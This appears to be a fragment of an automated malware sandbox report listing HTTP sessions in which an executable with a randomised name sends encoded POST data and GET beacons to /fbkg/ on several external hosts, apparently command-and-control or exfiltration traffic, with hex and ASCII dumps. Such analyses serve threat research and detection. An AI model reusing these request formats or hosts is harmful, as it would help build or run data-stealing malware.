+eM+1PpyGgFubwmuHVp8lvKB6ukbavLRtXi3nrtTJdu5UlvJaQkpidUaYcQ/BIg0+jswAKPoM41Rh1+HbPIJfmfoif01KRvh370PJclrpEueWgAfT2zJErrvHwQfe/ZUoojiEtik8LOw2Xh1Fd+c2KJxasMLatv1XqHfUQduvunH4RqtuHr2HYvC8v59IuBnNbpgRU1d472rPnot4A8CggHG2nxjLtDPgjfYt/cIwd5JqlqlvSmoWM+yQkI0y1XBeQ/6qwPncEvGzXzposl1ezjX5uqdfTn39bOLUeK450qBhaDkbI+xYpEW7w2HxxYvz/pXWQuCpMJyQLg4E76KTvc/QOdGxKfX3hgSGIF6iIlfTVXbnZgTiiNSzMPQKwdH1bsELJmQerraXLk292tJ09WHJpzFxtOu4g0RlNqIQN+a5HCwNMRcCGLVmzQeCNhbTZ8JcpOhJK1nBP+9ixYxZHpgExMh7XI2wErg0pF7ZF9pNKDVFfBKCQw3KaSkFvhOrWj0/FabOtpsdWGapy41Qu+J3OvjRbZQtsJJHDCPCmoqbC0z+mkvui5BOqvAC7iVpw6pM8FN4p4cOn3zHUBtJVdaF+OyWVgmsxk75wsrJ622jwbkmSuQE2b1gPx0IUXNhdSwIP7r+0PwCK1ctVx/LAL5vEn61EOfX9NmybFFpsre47bYdB/y3xck6EbDIvlpcZYeUvwV+xcaBKbdjKFYI+dyga6+kvq+qB4j5vyKkKsCtVFWHskR/5YZyUxM+h9n72WtgDHtYZwuNKJlRercmNf0Z9CbeX5gjUkZFzrmT3ce42F/Io8HVV3IAyaB0sEuMkwpQves6Z8CA8qkiIqnf78Gqlhq2ajlWDf0mFucFbNLhuELOuwehPujD36HNda2nJJ8hGypyFqdENP6ImXQCxrucQmAnI+UVPOX0EGG8TX5Fj6eKFC4fMrGT4HvrAgzGb1KtEtX3BoGj+FTTdYSdJCUYqcM0g3j6akxV36GAs4Jn9Qj/NMiKoxuVC5npnzonu5hZ3SHGV5A1KezYBPKkY+EEOlNUZcZXhV69J1P58qrT9MvL9UfkHkvRcN6HgPwTcNY5x12Wo9SvWrldV1j5dbHA+XaFtL1ksnQWTh0QxoYUBkmFOnwX2189g93ittajlL7RU38Ng9R9kIJvA2q+cMUrH9HOcJ+1o53XGZzzE4/6Tmnzf0x3nCa8kGeiDqhz0KNIYUDWy63/qxqmID/i6/uCXc0wDKvHlOhSQcnVyygpXi/VUatXZz2E+EsJIcejpE9opxwFqdnMhRCNaBIHESLX9cv0hHJK/L7o7miCMNdQrmOjP8Z/wKqNJTdVXGZkyV5bc3hJt1rrQpxoBns3SXovLcM2THjYKWtGQOpRsSI6ETVTp4IB6UF8C7LvMlNbhkQc532j4bzA5TMNwzZF+9OyIvvJKmCJOfKNYhfXOQ/p0khhaGNw+AksUENLD8e4q1JRzwp8DBXBQrpkv8WtizBsyIqV/e+se9bUAqlfS8klf0RoH7DSL0kjNkWJy1I2cNdS6tcCfxClb7G4NhYzhfp+77V
                                                                                                                                                                                                Nov 17, 2023 19:32:26.971451044 CET1441OUTData Raw: 42 38 38 31 7a 59 76 65 47 58 31 79 69 51 30 49 56 37 43 69 47 4f 32 59 48 71 32 44 54 76 55 6b 6a 36 79 6e 35 48 34 70 48 50 51 30 55 59 63 77 4c 66 2b 59 62 42 30 64 46 6f 34 44 58 6d 4a 30 6f 41 6a 6c 6c 32 63 70 65 2f 42 59 4f 38 56 4d 73 58
                                                                                                                                                                                                Data Ascii: B881zYveGX1yiQ0IV7CiGO2YHq2DTvUkj6yn5H4pHPQ0UYcwLf+YbB0dFo4DXmJ0oAjll2cpe/BYO8VMsXR23neGSdlPaLUujfMM/pyWKb45SdFV6JSADhZ6/dnsOGhURb2X+ohlpedmpesvacn2RYulqgfJ9tntevwZGCc2rzJxGXaIXErOBCAFjlmVmJZaE4W/mwoEi3QoycCOGzwYyvSnXlY20vYETLAnujaW5bbs94QFtIx
                                                                                                                                                                                                Nov 17, 2023 19:32:28.096101999 CET1442OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.g9rq2sx.icu
                                                                                                                                                                                                Referer: http://www.g9rq2sx.icu/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 43 41 55 2b 33 58 4f 51 55 4c 78 4e 74 4d 6c 6c 41 69 4b 74 46 6c 62 53 52 35 61 58 64 76 4f 72 72 79 30 58 52 4d 54 62 47 46 6a 66 37 48 6e 4d 6d 70 49 6d 53 2f 73 59 46 76 62 6f 59 49 34 36 42 67 4e 72 39 70 77 4e 6b 6f 37 47 46 5a 5a 5a 33 65 55 6b 2f 47 6e 36 31 4a 55 78 76 72 4c 4c 4d 71 39 64 48 58 78 58 68 58 4b 52 6c 44 2b 43 4b 77 4e 54 6a 4a 47 38 73 70 50 52 31 48 72 51 56 56 54 66 5a 75 2b 54 73 71 34 39 63 78 6f 70 6d 52 38 48 48 55 38 33 76 41 79 37 45 68 78 67 72 4d 76 73 33 70 64 71 79 41 76 45 67 31 72 4b 56 37 79 69 59 55 4d 56 31 33 63 51 34 30 33 4d 53 6f 58 54 4c 6d 56 78 32 61 6b 4b 37 6d 53 37 35 68 44 76 50 62 74 6c 4e 31 72 69 33 61 64 59 69 56 57 2b 6d 4e 41 64 56 38 75 43 38 57 4e 66 36 56 68 48 64 53 6b 6b 72 55 39 38 4d 6d 68 4c 6e 48 56 6c 50 4c 59 45 68 79 4a 31 61 69 46 75 69 70 7a 43 43 58 56 33 61 7a 74 48 4e 63 56 79 79 6e 56 54 47 76 64 66 2f 6a 4a 48 50 62 62 36 72 6b 4f 43 48 4c 47 4e 35 42 48 6b 78 68 2b 6f 47 79 67 37 31 32 63 6e 78 4e 49 69 72 58 6d 46 2f 6a 4e 7a 6a 50 56 39 4e 54 67 79 49 58 77 39 2b 45 5a 47 31 39 66 65 59 32 6b 4a 49 4e 6d 41 34 4d 72 63 74 50 67 6c 41 74 62 65 4a 33 75 50 72 45 35 4d 44 4e 2b 77 54 43 75 37 4f 31 4d 4b 78 58 79 43 74 4a 50 78 35 4b 70 49 76 4c 33 38 4d 74 36 4c 4b 33 78 76 72 6c 61 66 6a 6e 72 4c 35 4e 38 55 57 70 34 73 64 70 4d 33 44 74 51 57 34 52 32 6b 33 39 46 6b 62 5a 52 42 42 53 67 52 2b 57 44 33 74 7a 45 4e 5a 55 55 6a 47 53 55 33 58 2b 61 4f 32 38 51 47 70 4c 4f 4e 72 54 77 49 46 47 6d 76 59 4e 74 56 31 6b 53 4a 46 67 6a 78 62 31 71 74 6f 73 51 45 45 5a 43 72 77 6e 36 78 54 56 61 4f 41 4e 58 45 6e 4f 6b 51 42 4a 7a 55 72 61 4d 71 6b 70 44 73 70 55 4c 63 41 46 5a 7a 69 64 58 2b 44 54 62 7a 71 58 5a 66 63 59 6d 55 5a 68 6f 2b 72 4f 74 64 48 6f 73 33 74 46 6b 30 63 58 4d 7a 57 73 69 71 51 2b 6b 30 6e 73 6a 56 7a 75 62 72 5a 44 71 38 34 4b 48 4c 69 6f 4e 32 51 70 66 72 79 54 61 55 56 4f 5a 48 2f 43 4d 57 33 73 37 51 56 65 49 56 38 53 38 4c 5a 72 67 36 52 79 69 38 50 30 74 50 62 73 44 6e 6e 47 45 6c 59 30 71 6d 65 62 7a 53 7a 69 42 38 6d 46 37 68 35 31 73 4f 4f 7a 7a 46 5a 32 68 52 6f 44 57 67 49 32 54 6e 50 58 53 4b 74 64 2b 66 72 58 34 75 51 48 45 69 58 65 33 73 69 72 38 6f 68 59 45 77 6d 6a 41 63 65 6e 2b 66 6f 37 33 71 61 7a 53 52 64 36 74 4b 31 51 70 6e 2f 31 39 4a 61 67 78 74 53 73 67 68 79 4b 2b 72 41 6f 4f 2f 58 71 61 57 74 70 30 2b 74 54 61 2f 76 72 38 78 4e 47 70 71 33 43 2b 6e 38 67 69 42 53 71 4d 47 71 72 58 33 42 38 75 50 73 36 75 76 37 4f 64 59 72 58 59 2b 4c 63 31 65 33 33 75 36 55 63 49 4a 6a 4d 2f 7a 70 43 39 30 74 65
                                                                                                                                                                                                Data Ascii: T6I=CAU+3XOQULxNtMllAiKtFlbSR5aXdvOrry0XRMTbGFjf7HnMmpImS/sYFvboYI46BgNr9pwNko7GFZZZ3eUk/Gn61JUxvrLLMq9dHXxXhXKRlD+CKwNTjJG8spPR1HrQVVTfZu+Tsq49cxopmR8HHU83vAy7EhxgrMvs3pdqyAvEg1rKV7yiYUMV13cQ403MSoXTLmVx2akK7mS75hDvPbtlN1ri3adYiVW+mNAdV8uC8WNf6VhHdSkkrU98MmhLnHVlPLYEhyJ1aiFuipzCCXV3aztHNcVyynVTGvdf/jJHPbb6rkOCHLGN5BHkxh+oGyg712cnxNIirXmF/jNzjPV9NTgyIXw9+EZG19feY2kJINmA4MrctPglAtbeJ3uPrE5MDN+wTCu7O1MKxXyCtJPx5KpIvL38Mt6LK3xvrlafjnrL5N8UWp4sdpM3DtQW4R2k39FkbZRBBSgR+WD3tzENZUUjGSU3X+aO28QGpLONrTwIFGmvYNtV1kSJFgjxb1qtosQEEZCrwn6xTVaOANXEnOkQBJzUraMqkpDspULcAFZzidX+DTbzqXZfcYmUZho+rOtdHos3tFk0cXMzWsiqQ+k0nsjVzubrZDq84KHLioN2QpfryTaUVOZH/CMW3s7QVeIV8S8LZrg6Ryi8P0tPbsDnnGElY0qmebzSziB8mF7h51sOOzzFZ2hRoDWgI2TnPXSKtd+frX4uQHEiXe3sir8ohYEwmjAcen+fo73qazSRd6tK1Qpn/19JagxtSsghyK+rAoO/XqaWtp0+tTa/vr8xNGpq3C+n8giBSqMGqrX3B8uPs6uv7OdYrXY+Lc1e33u6UcIJjM/zpC90te
                                                                                                                                                                                                Nov 17, 2023 19:32:28.471415997 CET1445OUTData Raw: 67 4e 67 4a 72 54 5a 77 71 6e 48 4e 2b 45 73 72 4a 63 2f 6e 61 7a 57 63 52 59 44 6b 39 76 4b 30 5a 6f 79 66 43 66 66 63 42 69 52 4b 31 62 63 4f 2b 47 70 6a 74 71 50 36 37 2f 52 45 36 54 7a 4c 73 45 73 79 54 34 30 38 43 44 4b 39 30 54 6b 6b 48 66
                                                                                                                                                                                                Data Ascii: gNgJrTZwqnHN+EsrJc/nazWcRYDk9vK0ZoyfCffcBiRK1bcO+GpjtqP67/RE6TzLsEsyT408CDK90TkkHf53bJc8s+CWNIdffLA5xf+8GBbYU0igR8579TrQTmbOzHaQx+ykswaUJqfATlNp48AL7GePxcrd0MPxLNJdbCx3Ct7ZU4P9z8bB+xsBIqJ+YOKgUo9Rr0m/IJeaPRu4zjr5fCLDlwhFzJ0iYJ1sodllAv3jGTD0u+K
                                                                                                                                                                                                Nov 17, 2023 19:32:28.845421076 CET1446OUTData Raw: 6a 38 6f 41 43 5a 6b 56 6a 67 5a 41 79 4a 69 49 62 46 5a 6c 58 4c 58 4f 30 66 53 77 48 50 36 38 4a 58 43 43 56 44 52 66 62 67 62 75 6b 6a 57 67 41 65 39 62 4c 61 4b 54 59 43 63 53 43 45 70 79 37 79 30 52 2f 30 32 54 37 34 61 63 42 79 71 39 6d 79
                                                                                                                                                                                                Data Ascii: j8oACZkVjgZAyJiIbFZlXLXO0fSwHP68JXCCVDRfbgbukjWgAe9bLaKTYCcSCEpy7y0R/02T74acByq9myxv3YMtLH7eDr5JEQLP196c1UOPRWXpq8fMWaX8Oj3Q3jLsZ9w/fkUi5i7tAyCy1tmSQlVmg35pwUZM3o2o1nw9g6WfLzIw7EGV9fEMgReQa06xU0OT7HTl3lMxhSASdxw9XrUntRsH4dWsFzW3ivLG0qj8gyqHsA0
                                                                                                                                                                                                Nov 17, 2023 19:32:29.209249973 CET1451OUTData Raw: 66 55 59 56 47 33 33 6f 6c 39 46 4c 36 77 73 62 72 64 54 75 55 34 52 46 68 53 63 73 56 65 59 64 71 55 77 30 76 7a 52 51 6b 33 43 6a 4a 6a 67 7a 4e 4c 6f 6f 34 36 64 4a 56 58 31 6f 51 70 79 4b 4c 52 2f 59 49 66 45 69 37 63 6c 46 37 79 31 45 51 30
                                                                                                                                                                                                Data Ascii: fUYVG33ol9FL6wsbrdTuU4RFhScsVeYdqUw0vzRQk3CjJjgzNLoo46dJVX1oQpyKLR/YIfEi7clF7y1EQ0U/d3x/uq781cwxq/PEQQIAgylYbS9JC4Rc9eQh/NqftjnnVYY8DN/sKjDGzaGTH3yhqv4LkSX37MMb6z7ePdwFFg589RCgtRznbjnTp0kni64oAAmi20Xw8PkZABKyqkaJJh7hQQrcQgWxqweFzcIWXVRIv1b62Ch
                                                                                                                                                                                                Nov 17, 2023 19:32:29.209424019 CET1456OUTData Raw: 33 78 41 6e 54 64 49 50 4e 7a 56 38 4d 59 45 73 75 59 68 37 68 51 57 75 76 31 51 41 61 64 41 6f 44 62 6a 44 55 44 78 7a 4d 4e 58 51 59 50 61 66 6e 30 69 46 53 4e 6a 34 44 4b 2b 4a 6b 77 47 2b 4e 79 65 69 48 7a 52 48 6b 4a 42 44 48 70 50 66 44 69
                                                                                                                                                                                                Data Ascii: 3xAnTdIPNzV8MYEsuYh7hQWuv1QAadAoDbjDUDxzMNXQYPafn0iFSNj4DK+JkwG+NyeiHzRHkJBDHpPfDi8vnnzmCxzVDZsJ9YwApGxm5LAq1si36hFP0RSWsOfAUkYIvsuBbM0rXH2poQmY+dkrAoEb4i/aFwP4XYbsNJpXr//lfLNVzQKXC156E/rLuhWlWEN7sD1H3r9KfaBicZR8P2WdX8d0pKZ6L2ibPP1c9ELCMLNqr/l
                                                                                                                                                                                                Nov 17, 2023 19:32:29.586930990 CET1458OUTData Raw: 31 42 45 44 6a 49 45 63 50 35 70 76 35 72 71 79 52 2b 62 5a 55 6f 41 38 6a 65 38 77 6b 39 5a 49 36 39 65 37 4f 55 35 68 6d 33 4c 46 34 2f 79 46 46 31 34 45 4f 38 45 79 66 4e 42 4e 31 50 72 73 62 39 75 79 48 57 75 76 53 6b 37 4d 56 51 37 70 32 6a
                                                                                                                                                                                                Data Ascii: 1BEDjIEcP5pv5rqyR+bZUoA8je8wk9ZI69e7OU5hm3LF4/yFF14EO8EyfNBN1Prsb9uyHWuvSk7MVQ7p2jLKKFucBF3a05UlZFjrKhQsQ/aP/T8W5G+pExxUboM40hLG0p42ZaRkUP8IevsJ00Eq2rwjK3DFKSU2U6wzw0CKAo7nLwEmsxdtAymijmQk/uiey+tjW+zNgbs/GiCI3RRu4Eu/qO8KaqthrwNyDyvAOnP8v1eve2N
                                                                                                                                                                                                Nov 17, 2023 19:32:30.517549992 CET1459OUTData Raw: 33 4b 46 7a 31 70 6d 55 2f 34 37 6a 62 4a 55 6e 70 76 54 4e 56 66 68 34 79 36 32 34 44 39 55 42 41 71 36 43 44 47 6c 64 4d 6c 30 44 74 6a 2f 76 63 71 2b 53 42 39 4e 39 46 46 74 47 56 53 6f 66 52 6e 72 4b 4f 55 34 63 53 41 69 34 76 4b 47 63 47 6d
                                                                                                                                                                                                Data Ascii: 3KFz1pmU/47jbJUnpvTNVfh4y624D9UBAq6CDGldMl0Dtj/vcq+SB9N9FFtGVSofRnrKOU4cSAi4vKGcGm6b8UZ9CPNX/e5xfDMo2xpYLK6nCEHJVMWTAjIHoiL1/bLhGhMuaNILJlTkiMrWFEFTtBBiGijBtk5CzIVOaT+ItVIxepQ8VpOARIlYiEoiVBsI1m8R8GPRF4SkVtwyVPohWjyZ40hg7VAzbdRffZZ8LRrOk42IZVN
                                                                                                                                                                                                Nov 17, 2023 19:32:30.897147894 CET1462OUTData Raw: 4a 44 53 42 55 45 2f 31 61 6c 5a 48 47 48 74 32 38 32 77 30 4d 32 6d 4b 76 62 4b 30 38 6f 35 49 62 34 62 44 34 34 7a 73 6a 2f 6f 39 2b 68 70 45 78 2b 78 4b 76 4e 34 30 45 36 33 4e 45 57 38 4a 33 44 4b 73 64 61 59 4e 73 70 66 44 49 6e 6c 54 6b 4d
                                                                                                                                                                                                Data Ascii: JDSBUE/1alZHGHt282w0M2mKvbK08o5Ib4bD44zsj/o9+hpEx+xKvN40E63NEW8J3DKsdaYNspfDInlTkMMM+M00DGa8K0qjfVSd6FojDj33UX+K/po0GJy5Jbt4JV01RMDqdeoQ2SBrGPTFrznP2YnN4nub7YZv6vUjZeKAtE+i8uRS6Q6AaUlT40IxndgFvCXOH2XtPZfOKMju8grTji2/o5zbI3lth1WnMLXrUD39xoUCe6a
                                                                                                                                                                                                Nov 17, 2023 19:32:30.897322893 CET1465OUTData Raw: 2f 61 2f 47 50 4a 41 65 2f 48 69 66 44 78 46 65 73 55 47 53 41 42 43 66 74 54 54 33 6a 49 50 76 42 35 69 33 77 70 68 6a 5a 6e 36 76 48 46 4c 46 6a 4d 76 39 43 44 50 6f 54 4b 77 57 56 6a 31 44 31 65 54 48 62 77 78 6f 46 7a 31 54 69 37 4a 33 6a 64
                                                                                                                                                                                                Data Ascii: /a/GPJAe/HifDxFesUGSABCftTT3jIPvB5i3wphjZn6vHFLFjMv9CDPoTKwWVj1D1eTHbwxoFz1Ti7J3jdQIYlkGreulCPBu5MEQ9LkDnmQQyEUznzWDAR6K6spcPI/OzE3m86y9z0ySmh8AS5eBzyjy6r1iHUMj4qGR6zlC5zYe3qHMuDELQX85mbIZRDNrB/jYr4oJHuYtFH5LISg1oNPijKI1rCIYYBwZZbJP05ZaJKxWXNO
                                                                                                                                                                                                Nov 17, 2023 19:32:33.688695908 CET1467OUTData Raw: 4a 44 53 42 55 45 2f 31 61 6c 5a 48 47 48 74 32 38 32 77 30 4d 32 6d 4b 76 62 4b 30 38 6f 35 49 62 34 62 44 34 34 7a 73 6a 2f 6f 39 2b 68 70 45 78 2b 78 4b 76 4e 34 30 45 36 33 4e 45 57 38 4a 33 44 4b 73 64 61 59 4e 73 70 66 44 49 6e 6c 54 6b 4d
                                                                                                                                                                                                Data Ascii: JDSBUE/1alZHGHt282w0M2mKvbK08o5Ib4bD44zsj/o9+hpEx+xKvN40E63NEW8J3DKsdaYNspfDInlTkMMM+M00DGa8K0qjfVSd6FojDj33UX+K/po0GJy5Jbt4JV01RMDqdeoQ2SBrGPTFrznP2YnN4nub7YZv6vUjZeKAtE+i8uRS6Q6AaUlT40IxndgFvCXOH2XtPZfOKMju8grTji2/o5zbI3lth1WnMLXrUD39xoUCe6a


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                75192.168.11.205020238.163.97.880C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:31.330907106 CET1466OUTGET /fbkg/?T6I=PC8e0hC+cIQTnclfHQ3xPAnXS9OxWPaYzl0ycer2FX7V7GbntrkDNJJkHJfieMUxDyk07bs06KjLIr5P3Os380726bA+wrTdYA==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:32:34.724539995 CET1468INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:36 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Data Raw: 31 61 39 0d 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 39 4f 4b 47 74 47 35 47 70 4a 57 72 47 45 53 22 2c 63 6b 3a 22 4b 39 4f 4b 47 74 47 35 47 70 4a 57 72 47 45 53 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 34 50 78 4d 64 32 6a 71 6c 52 4d 39 57 52 6b 22 2c 63 6b 3a 22 4b 34 50 78 4d 64 32 6a 71 6c 52 4d 39 57 52 6b 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6d 64 6e 65 77 2e 6f 73 73 2d 63 6e 2d 68 6f 6e 67 6b 6f 6e 67 2e 61 6c 69 79 75 6e 63 73 2e 63 6f 6d 2f 74 7a 39 39 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1a9<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"K9OKGtG5GpJWrGES",ck:"K9OKGtG5GpJWrGES"})</script><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"K4PxMd2jqlRM9WRk",ck:"K4PxMd2jqlRM9WRk"})</script><script charset="UTF-8" id="LA_COLLECT" src="https://mdnew.oss-cn-hongkong.aliyuncs.com/tz999.js"></script>0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                7538.163.97.880192.168.11.2050202C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:31.330907106 CET1466OUTGET /fbkg/?T6I=PC8e0hC+cIQTnclfHQ3xPAnXS9OxWPaYzl0ycer2FX7V7GbntrkDNJJkHJfieMUxDyk07bs06KjLIr5P3Os380726bA+wrTdYA==&Nx1L1=526dgl_phJ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.g9rq2sx.icu
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Nov 17, 2023 19:32:34.724539995 CET1468INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:32:36 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Data Raw: 31 61 39 0d 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 39 4f 4b 47 74 47 35 47 70 4a 57 72 47 45 53 22 2c 63 6b 3a 22 4b 39 4f 4b 47 74 47 35 47 70 4a 57 72 47 45 53 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 34 50 78 4d 64 32 6a 71 6c 52 4d 39 57 52 6b 22 2c 63 6b 3a 22 4b 34 50 78 4d 64 32 6a 71 6c 52 4d 39 57 52 6b 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6d 64 6e 65 77 2e 6f 73 73 2d 63 6e 2d 68 6f 6e 67 6b 6f 6e 67 2e 61 6c 69 79 75 6e 63 73 2e 63 6f 6d 2f 74 7a 39 39 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 1a9<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"K9OKGtG5GpJWrGES",ck:"K9OKGtG5GpJWrGES"})</script><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"K4PxMd2jqlRM9WRk",ck:"K4PxMd2jqlRM9WRk"})</script><script charset="UTF-8" id="LA_COLLECT" src="https://mdnew.oss-cn-hongkong.aliyuncs.com/tz999.js"></script>0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                76192.168.11.205020334.126.191.8480C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:32:40.070699930 CET1474OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.jilimacao1.com
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.jilimacao1.com
                                                                                                                                                                                                Referer: http://www.jilimacao1.com/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 4d 36 4c 33 6b 45 75 50 69 56 59 50 66 69 39 2f 43 57 6d 44 53 56 50 71 65 35 4a 31 4e 52 4d 68 53 59 6e 68 34 31 62 76 6b 74 59 46 44 45 72 31 6d 70 67 4a 68 32 5a 55 43 56 58 47 48 65 44 44 45 32 65 44 6e 4d 6c 71 58 41 72 53 79 31 33 44 79 6a 37 6b 61 2b 58 35 74 35 62 78 7a 4d 72 51 65 2b 5a 51 34 74 76 48 77 2b 6c 66 38 73 4f 54 36 6c 75 79 6e 70 63 4e 31 33 63 77 46 59 41 48 4f 58 4c 39 77 4a 38 76 47 6b 4a 73 70 76 6c 46 4b 76 63 58 6c 49 4d 71 36 48 78 70 61 4d 63 67 6c 61 50 5a 34 66 6f 77 6d 6f 57 48 48 5a 44 64 4f 51 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=M6L3kEuPiVYPfi9/CWmDSVPqe5J1NRMhSYnh41bvktYFDEr1mpgJh2ZUCVXGHeDDE2eDnMlqXArSy13Dyj7ka+X5t5bxzMrQe+ZQ4tvHw+lf8sOT6luynpcN13cwFYAHOXL9wJ8vGkJspvlFKvcXlIMq6HxpaMcglaPZ4fowmoWHHZDdOQ==
                                                                                                                                                                                                Nov 17, 2023 19:32:40.484343052 CET1475INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Content-Type: text/html
